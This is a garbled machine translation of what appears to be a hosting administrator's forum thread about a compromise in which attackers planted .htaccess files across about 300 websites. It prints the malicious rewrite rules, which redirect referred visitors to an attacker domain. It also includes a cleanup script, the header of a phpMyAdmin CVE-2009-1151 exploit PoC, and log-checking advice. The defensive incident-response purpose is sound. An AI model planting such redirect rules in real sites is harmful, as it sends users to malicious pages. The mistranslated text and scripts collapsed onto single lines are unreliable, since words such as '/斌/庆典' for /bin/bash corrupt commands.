我们运营一个托pipe大约300个网站的网站服务器。
昨天早上,一个脚本在大多数(但不是全部)站点的document_root下的每个目录中都放置了.htaccess文件,这些文件由www-data(apache用户)拥有。
.htaccess文件的内容是这样的:
RewriteEngine On RewriteCond %{HTTP_REFERER} ^http:// RewriteCond %{HTTP_REFERER} !%{HTTP_HOST} RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR} 谷歌search该url(这是“杀毒软件”的md5哈希),我发现这一切都发生在互联网上,并正在寻找已经处理这个问题的人,并确定漏洞是在哪里 。
我搜查了大部分日志,但还没有发现任何结论。 有没有其他人经历过比我更深入的洞察?
到目前为止我们已经确定:
任何更多的提示将不胜感激。
== ==编辑
对于那些需要它的人,这里是我用来清理.htaccess文件的脚本:
#!/bin/bash PATT=84f6a4eef61784b33e4acbd32c8fdd72.com DIR=/mnt TMP=/tmp/`mktemp "XXXXXX"` find $DIR -name .htaccess|while read FILE; do if ( grep $PATT "$FILE" > /dev/null); then if [ `cat "$FILE"|wc -l` -eq 4 ]; then rm "$FILE" else if ( tail -n1 "$FILE"|grep $PATT > /dev/null ); then rm $TMP cp "$FILE" $TMP LINES=`cat $TMP|wc -l` GOODLINES=$(($LINES-4)) head -n $GOODLINES $TMP > "$FILE" else echo $FILE requires manual intervention fi fi fi done
有一个phpMyAdmin的利用
#!/斌/庆典
#CVE-2009-1151:phpMyAdmin'/scripts/setup.php'PHP代码注入RCE PoC v0.11
#pagvac(gnucitizen.org),2009年6月4日。
#特别感谢格雷格Ose(labs.neohapsis.com)发现这样一个很酷的阴险,
#和str0ke(milw0rm.com)来testing这个PoC脚本并提供反馈!#PoC脚本已成功通过以下目标testing:
#phpMyAdmin 2.11.4,2.11.9.3,2.11.9.4,3.0.0和3.0.1.1
#Linux 2.6.24-24 – 通用i686 GNU / Linux(Ubuntu 8.04.2)#攻击要求:
#1)易受攻击的版本(显然!):2.11.x之前的2.11.9.5
根据PMASA-2009-3,3.1.3.1之前的#和3.x
#2) 看起来这个漏洞只能被用来对付环境
#pipe理员select安装phpMyAdmin
# 向导方法,而不是手动方法: http : //snipurl.com/jhjxx
#3)pipe理员必须没有删除'/ config /'目录
#在/ phpMyAdmin /目录中。 这是因为这个目录是
#其中'/脚本/设置.php'试图创build'config.inc.php'这是哪里
#我们邪恶的PHP代码注入8)#更多信息:
#http ://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
#http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/
由于攻击似乎是通过apache进入的,我会做这两件事情:
grep -rn '\.htaccess' /var/log/httpd/*access* 这将首先告诉networking用户本身是否被入侵,或者攻击者是否正在使用任意命令执行。 它也可能给出(潜在的)完整的攻击者所做的事情。 尽pipe听起来很愚蠢,但像这样的大多数黑客很less会自行清理并留下这样的证据。
当然,如果您的组织中有一个团队执行安全事件响应或取证检查,那么在您开始自己的分析之前,可能需要将设备交给他们。